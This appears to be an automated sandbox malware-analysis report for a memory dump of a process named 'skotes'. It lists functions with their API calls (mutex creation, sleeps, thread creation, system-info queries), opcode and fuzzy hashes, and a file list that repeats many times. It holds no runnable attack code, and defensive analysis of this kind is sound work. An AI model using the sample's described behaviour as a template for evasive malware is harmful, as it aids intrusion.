Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2~
API String ID: 396266464-3459864372
Opcode ID: f1eba720b85feb692403fb4a3e68adf3e90881ca7897750ce99742b6f988d6fe
Instruction ID: fd0683e19545f97ffebc23e3ed149013a5ef88793156b1596e2e6e796bf7f7a8
Opcode Fuzzy Hash: f1eba720b85feb692403fb4a3e68adf3e90881ca7897750ce99742b6f988d6fe
Instruction Fuzzy Hash: 76312931B85144EBFB18AB78DD8DB5DBB62AB85320F24421EE0149B2D5E73D5D818722

Function 0078A960 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43sleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000064,?), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: e440fab1b3e61150182549f803790c73bb9bc56d1a1023d54057d825a2767bde
Instruction ID: cca393778fad0d7ebaaf572e73dc3c7295ce636c97ccd01cb3835c1ffe668635
Opcode Fuzzy Hash: e440fab1b3e61150182549f803790c73bb9bc56d1a1023d54057d825a2767bde
Instruction Fuzzy Hash: 77E086107DE380F5F6183269588DB2D665997DA710F21046EE744CF1E0C96C69408367

Function 00788380 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00788524

Strings

=L-t, xrefs: 007883AB

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: =L-t
API String ID: 1721193555-768041998
Opcode ID: 7aa9a3f05e58bc9d1464c5d67816ad108e078ce484c8287ffdfdced84b71d4f4
Instruction ID: 7ade04d70b88d8e5e598f8d34363af4ff7817d6b7a8e075a791fcc81dbab4a32
Opcode Fuzzy Hash: 7aa9a3f05e58bc9d1464c5d67816ad108e078ce484c8287ffdfdced84b71d4f4
Instruction Fuzzy Hash: FE511771D50248DBDB68FB68CD49BDDB775EB45310F904298E408A7282EF395E908B92

Function 007B7124 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,007B705B,?,?,00000000,00000000), ref: 007B7166

Strings

=L-t, xrefs: 007B712C

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID: =L-t
API String ID: 2574697306-768041998
Opcode ID: 22a7b42995cfe1665f48d036e8ec65a5ac1a6a04b5a179216da8086b7a4841d1
Instruction ID: 949a83acedbabf76e4501f0a45142b894211bf89be3d4e8a323176d2eaf6c3e9
Opcode Fuzzy Hash: 22a7b42995cfe1665f48d036e8ec65a5ac1a6a04b5a179216da8086b7a4841d1
Instruction Fuzzy Hash: AD11187290410CABDB14DE99C885EDFB7BDAB88310F205262E511E2080EA34EA0ACB71

Function 00796C70 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00796CF5

Strings

=L-t, xrefs: 007947C4, 00796C86

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: =L-t
API String ID: 3472027048-768041998
Opcode ID: 5b820808767e599d94e6509a5eaf2a1307d005f2327fb6d5ac25b00ee6869e4e
Instruction ID: c9ba536f4a98a439cf964268f405b1dc2fab6aff6290158c7517b201fc8c8f12
Opcode Fuzzy Hash: 5b820808767e599d94e6509a5eaf2a1307d005f2327fb6d5ac25b00ee6869e4e
Instruction Fuzzy Hash: B7F0F971A40644E7CB007B7D9C0BB1E7B78EB07760F804748E4116B2D2EB3C1A0147D6

Function 00796D00 Relevance: 3.0, APIs: 2, Instructions: 14sleepthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00796D11
Sleep.KERNELBASE(00007530), ref: 00796D25

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateSleepThread
String ID:
API String ID: 4202482776-0
Opcode ID: 5527eeaf5dd6e3017d3964edf637b4a475d7daaf21f5dae96da8ae2c010fcdf2
Instruction ID: a9bb885ceb9aae38c32b9e24cda9694d8051817d18c121e9e573d5f2eb8126a0
Opcode Fuzzy Hash: 5527eeaf5dd6e3017d3964edf637b4a475d7daaf21f5dae96da8ae2c010fcdf2
Instruction Fuzzy Hash: E7D08CB07C1314B7FA2003213C0BF26AA209B0AF80F65684077483F0D086E8340047EC

Function 007B6E4C Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

